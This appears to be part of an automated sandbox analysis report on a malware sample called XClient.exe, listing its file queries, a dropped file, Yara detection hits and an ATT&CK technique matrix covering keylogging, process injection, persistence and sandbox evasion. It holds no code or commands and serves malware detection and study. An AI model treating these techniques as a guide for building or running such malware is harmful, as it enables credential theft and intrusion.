Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	Queries volume information: C:\Users\user\checkcoin VolumeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	Queries volume information: C:\Users\user\checkcoin VolumeInformation	Jump to behavior
Source: C:\Users\user\checkcoin	Queries volume information: C:\Users\user\checkcoin VolumeInformation
Source: C:\Users\user\checkcoin	Queries volume information: C:\Users\user\checkcoin VolumeInformation

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: XClient.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe.bin.exe PID: 7084, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\checkcoin, type: DROPPED

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	121 Masquerading	1 Input Capture	21 Security Software Discovery	Remote Services	1 Input Capture	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	21 Registry Run Keys / Startup Folder	231 Virtualization/Sandbox Evasion	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement